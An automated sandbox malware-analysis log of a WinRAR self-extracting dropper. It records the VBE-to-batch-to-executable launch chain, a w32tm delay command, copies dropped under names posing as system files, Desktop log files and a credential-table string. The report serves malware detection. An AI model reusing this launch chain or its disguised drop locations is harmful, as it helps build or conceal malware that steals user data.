                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeMutant created: \Sessions\1\BaseNamedObjects\Local\c1cae4480a59c5014b843817dcbc793c3642b8e5032f288ad3b1f4c88d568202
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Q907SiRxS1Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" "
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCommand line argument: sfxname0_2_0037DF1E
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCommand line argument: sfxstime0_2_0037DF1E
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCommand line argument: STARTDLG0_2_0037DF1E
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCommand line argument: xz;0_2_0037DF1E
                          Source: CJF0Ri1HrG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeFile read: C:\Windows\win.iniJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: vscBin6hqM.13.dr, UrxRiHr1XE.13.dr, kO4bdXkONn.13.dr, pKV2TyFH9r.13.dr, lp3W65fjAl.13.dr, SlQQOUQ4YI.13.dr, jn8ZLrXO2y.13.dr, 7bWcWNF7kN.13.dr, OXnaIwaap4.13.dr, E7QyLMMMgO.13.dr, Lgf7mHanUj.13.dr, 7cRdzGnwM4.13.dr, 0xAgFwENCH.13.dr, Xymen1sgcp.13.dr, HSZ8zIATHv.13.dr, yxECZfxPPk.13.dr, nm2hyEJxLc.13.dr, Btlz2DKLK4.13.dr, aeUm86pc1E.13.dr, ynlhtOMkLj.13.dr, 6NeD6uzSrZ.13.dr, LHHB1t8AXe.13.dr, ayDFRodWcn.13.dr, WGQcNUm87S.13.dr, 7wnmzew4uT.13.dr, MXqrl4I1Rh.13.dr, IpCFBQp7Hn.13.dr, m21rsQ6lPt.13.dr, Jov5bgW2Mu.13.dr, ABTr0UF6Fl.13.dr, OYhv9v4nv7.13.dr, Rcpv6qDZFo.13.dr, IsH2sqAW5J.13.dr, wJ6I7RGTOP.13.dr, rpYtetqegq.13.dr, v88wvUdyVd.13.dr, xH7x5ubjFw.13.dr, VXqWsEBRgR.13.dr, UxCGjIscaZ.13.dr, YX9a1xbTqG.13.dr, lkW7BlCJN1.13.dr, ogPt8ZHFOO.13.dr, oMOZV4CgKG.13.dr, IkVR5JvxTE.13.dr, 0ihKRVV5nh.13.dr, GlX3F3zFgc.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: CJF0Ri1HrG.exeReversingLabs: Detection: 57%
                          Source: CJF0Ri1HrG.exeVirustotal: Detection: 49%
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeFile read: C:\Users\user\Desktop\CJF0Ri1HrG.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\CJF0Ri1HrG.exe C:\Users\user\Desktop\CJF0Ri1HrG.exe
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exe
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe "C:\Program Files (x86)\msbuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe"
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe "C:\Program Files (x86)\msbuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: CJF0Ri1HrG.exeStatic file information: File size 2730343 > 1048576
                          Source: CJF0Ri1HrG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: CJF0Ri1HrG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: CJF0Ri1HrG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: CJF0Ri1HrG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: CJF0Ri1HrG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: CJF0Ri1HrG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: CJF0Ri1HrG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: CJF0Ri1HrG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CJF0Ri1HrG.exe
                          Source: Binary string: 7..pDb source: hyperbrokerhostNetsvc.exe, 00000005.00000002.1940161275.00007FFD9C150000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: <".pDB source: CJF0Ri1HrG.exe
                          Source: CJF0Ri1HrG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: CJF0Ri1HrG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: CJF0Ri1HrG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: CJF0Ri1HrG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: CJF0Ri1HrG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeFile created: C:\PortCommon\__tmp_rar_sfx_access_check_6395125Jump to behavior
                          Source: CJF0Ri1HrG.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037F640 push ecx; ret 0_2_0037F653
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037EB78 push eax; ret 0_2_0037EB96
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 5_2_00007FFD9BAA4861 push ebx; iretd 5_2_00007FFD9BAA4864
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAB2B9C push E8FFFFFFh; retf 13_2_00007FFD9BAB2BA1
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAF7C4D pushfd ; ret 13_2_00007FFD9BAF7C50
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAC79A8 push edx; ret 13_2_00007FFD9BAC79BB
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAC44AF pushad ; iretd 13_2_00007FFD9BAC44B0
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAC44A8 pushad ; iretd 13_2_00007FFD9BAC44A9
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAA4C56 pushad ; retf 13_2_00007FFD9BAA4C57
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BAA4861 push ebx; iretd 13_2_00007FFD9BAA4864
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC9B428 push E8FFFFFFh; retf 13_2_00007FFD9BC9B431
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9BC77996 pushad ; ret 13_2_00007FFD9BC779A9
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9C172966 push ebx; retf 13_2_00007FFD9C172967
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9C16A3AD push E95DDA8Bh; ret 13_2_00007FFD9C16A3C9
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9C29451C push E8FFFFFFh; ret 13_2_00007FFD9C294521
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\EsydEbLs.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\avRZftgA.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\RUhcZACY.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\nxxgerdx.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\AFgebewE.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\vJfNUyGL.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\KxrkaJNA.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\EMydcNjR.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\OnibhGNt.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\GHBtTNNH.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\Public\TextInputHost.exeJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\ylcWNDYf.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\RMxJvRbT.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\pzkPzahs.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\dOeQuOYP.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\hWbZPhSL.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\WixjfVXd.logJump to dropped file
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeFile created: C:\PortCommon\hyperbrokerhostNetsvc.exeJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\pRCorSBW.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\CHTNxNAz.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\XWBrRjTb.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\sYzxNlvS.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\jHHpWudE.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\dxDIAclw.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\Help\mui\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\kekpPWli.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\PgdUomGa.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\QpUJDpSo.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\aMYstPaD.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\tqaFGXil.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\CbsTemp\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\TOksRAfO.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\Public\TextInputHost.exeJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\Help\mui\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\CbsTemp\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\XWBrRjTb.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\OnibhGNt.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\ylcWNDYf.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\nxxgerdx.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\dOeQuOYP.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\KxrkaJNA.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\tqaFGXil.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\jHHpWudE.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\QpUJDpSo.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\GHBtTNNH.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\EMydcNjR.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\pzkPzahs.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\hWbZPhSL.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\user\Desktop\WixjfVXd.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\RUhcZACY.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\kekpPWli.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\avRZftgA.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\RMxJvRbT.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\AFgebewE.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\pRCorSBW.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\PgdUomGa.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\EsydEbLs.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\vJfNUyGL.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\dxDIAclw.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\TOksRAfO.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\CHTNxNAz.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\sYzxNlvS.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile created: C:\Users\user\Desktop\aMYstPaD.logJump to dropped file

                          Boot Survival

                          barindex
                          Drops PE files to the user root directory
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Users\Public\TextInputHost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
